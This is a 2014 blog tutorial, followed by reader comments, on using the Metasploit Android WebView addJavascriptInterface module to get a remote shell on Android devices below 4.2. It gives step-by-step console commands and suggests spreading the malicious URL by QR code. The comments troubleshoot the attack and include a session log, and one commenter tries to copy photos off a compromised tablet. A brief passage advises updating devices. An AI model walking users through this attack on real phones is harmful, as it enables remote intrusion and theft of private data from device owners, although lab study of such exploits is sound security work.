Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

~ by D. Dieterle on February 26, 2014.

18 Responses to “Android Webview Exploit Tutorial (70% of Devices Vulnerable!)”

  1. hi … what was your browser name?

  2. I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas?

    • Are you running Kali in a Virtual Machine? I have seen the Anti-Virus/ firewall running on a Virtual Machine catch and block several of the exploits.

      • I am! This was running in an Oracle VirtualBox VM. Thanks for the feedback; I’ll try this from a native install tonight.

      • Hello again! I’m trying to get this working for a project for graduate school, and I’m still hitting difficulties. I’ll let you know what I’ve done in case I’ve missed a dependency somewhere.

        1) Loaded Kali Linux from a Live CD (Not a VM this time).
        2) Copied the Ruby code from Rapid 7’s website into /root/.msf4/modules/exploits/android/browser/webview_addjavascriptinterface.rb
        3) Loaded Applications–> Kali Linux–> System Services–> Metasploit–> community / pro start
        4) In a terminal, loaded msfconsole
        5) followed your guide to “use exploit/android/browser/webview_addjavascriptinterface” and set URIPATH
        6) Navigated to this site from a vulnerable phone.

        The phone redirects to /Security/(random string) and metasploit shows “Gathering target information” and “Serving exploit HTML”, but still, no connection/session is ever made. Any guidance would be appreciated? I appreciate the help! My next step may be to load an older ROM on the device in case Moto/Verizon silently released a patch somehow.

        The phone is a Verizon Droid RAZR MAXX OS 4.1.2.
        I’ve also tried using a TMobile HTC MyTouch (OS: 2.3.4) but this may be too out of date.

      • It is in the newer versions of Metasploit so you really don’t need to download the code from Rapid7. Just type “msfupdate” and it should pull down the latest exploits and updates for Metasploit. Maybe it needs something else in the updates to function? But your target system might have been patched for the exploit. I have a Kyocera phone that should be vulnerable by OS Version, but the Browser was patched so it isn’t.

  3. Can you confirm if this would also work from a WIndows installation of metasploit?

    I followed you guide, but used it from a Windows installed. I get to the part where my Android unit creates a session with the console I connect to that console number to interact, however, nothing happens after that.

    I enter commands and get no return to the console. Is there any ideas that you can pass my way?
    This is the last thing the console shows…

    GET /lolcat HTTP/1.1
    Host: 192.168.1.137:4444
    Connection: keep-alive
    Referer: http://goo.gl/
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; KENWOOD DNN 2013 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
    Accept-Encoding: gzip,deflate
    Accept-Language: en-US
    Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

    • As an update to this, I can answer my own question. The answer is yes – the exploit works in Windows and Linux.

      However, all of the devices and ADV builds (4.0, 4.03, 4.2 etc) all do the same thing – the final log in Metasploit is “Serving exploit HTML” followed by nothing.

      Can anyone confirm if they were able to get this exploit to work in ADV with any android 4.x images?

  4. Hello

    I have the same problem. If i work with the sdk emulator there is all right. I tested it with an real smartphone and had the same problems like chris.

    • I actually couldn’t get it working with a couple emulators, but got it working on about 50% of the Android devices I have tested so far – Phones and tablets. It is odd though, some devices that should be vulnerable by Android version number didn’t seem to be.

  5. Hi
    I have an access to the tablet! I can read the devices and can run some shell commands. But when i want to steal a picture with
    dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M

    i get the response /dev/sdc: cannot open for write: Permission denied

  6. At Kali Linux i use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
    msf exploit(webview_addjavascriptinterface) > [*] 192.168.178.23 webview_addjavascriptinterface – Gathering target information.
    [*] 192.168.178.23 webview_addjavascriptinterface – Sending response HTML.
    [*] 192.168.178.23 webview_addjavascriptinterface – Serving exploit HTML
    [*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000
    msf exploit(webview_addjavascriptinterface) > sessions -i 1
    [*] Starting interaction with 1…
    export PATH=/system/bin:$PATH
    ls -al
    drwxr-xr-x root root 2014-05-15 16:56 acct
    -rw-r–r– root root 332 2014-05-15 16:56 boot.txt
    drwxrwx–x system cache 2014-05-10 09:22 cache
    dr-x—— root root 2014-05-15 16:56 config
    lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
    drwxrwx–x system system 2014-05-12 09:41 data
    -rw-r–r– root root 129 2014-05-15 16:56 default.prop
    drwxr-xr-x root root 2014-05-15 17:12 dev
    drwxr-xr-x radio radio 2014-05-09 13:55 efs
    lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
    lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
    -rwxr-x— root root 105292 2014-05-15 16:56 init
    -rwxr-x— root root 1107 2014-05-15 16:56 init.cm.rc
    -rwxr-x— root root 2344 2014-05-15 16:56 init.goldfish.rc
    -rwxr-x— root root 5171 2014-05-15 16:56 init.p1-common.rc
    -rwxr-x— root root 5389 2014-05-15 16:56 init.p1.rc
    -rwxr-x— root root 936 2014-05-15 16:56 init.p1.usb.rc
    -rwxr-x— root root 17862 2014-05-15 16:56 init.rc
    -rwxr-x— root root 1637 2014-05-15 16:56 init.trace.rc
    -rwxr-x— root root 3915 2014-05-15 16:56 init.usb.rc
    -rw-r–r– root root 1664 2014-05-15 16:56 lpm.rc
    drwxrwxr-x root system 2014-05-15 16:56 mnt
    dr-xr-xr-x root root 1970-01-01 00:00 proc
    drwxr-xr-x root root 2014-05-09 13:55 radio
    drwxr-x— root root 2014-05-15 16:56 sbin
    lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
    d—r-x— system sdcard_r 2014-05-15 16:56 storage
    drwxr-xr-x root root 2014-05-15 16:56 sys
    drwxr-xr-x root root 2014-05-09 13:56 system
    -rw-r–r– root root 272 2014-05-15 16:56 ueventd.goldfish.rc
    -rw-r–r– root root 2035 2014-05-15 16:56 ueventd.p1.rc
    -rw-r–r– root root 5075 2014-05-15 16:56 ueventd.rc
    lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor
    I want to copy some pictures to my KALI system but there is the problem:
    dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
    /dev/sdc: cannot open for write: Permission denied
    Or i want to run adb (no device!)
    adb devices
    * daemon not running. starting it now on port 5038 *
    * daemon started successfully *
    List of devices attached

    • Is the phone rooted? If the phone is not rooted, there are several areas that you will not be able to access. For those who root their phone, it is pretty much one of the last lines of defense that you are removing.

  7. The phone is rooted ….. do you have an other idea? I can’t also download any files from the phone to my Desktop but i can delete folders etc. at the phone

  8. I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas? The OS don’t run in the VM.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: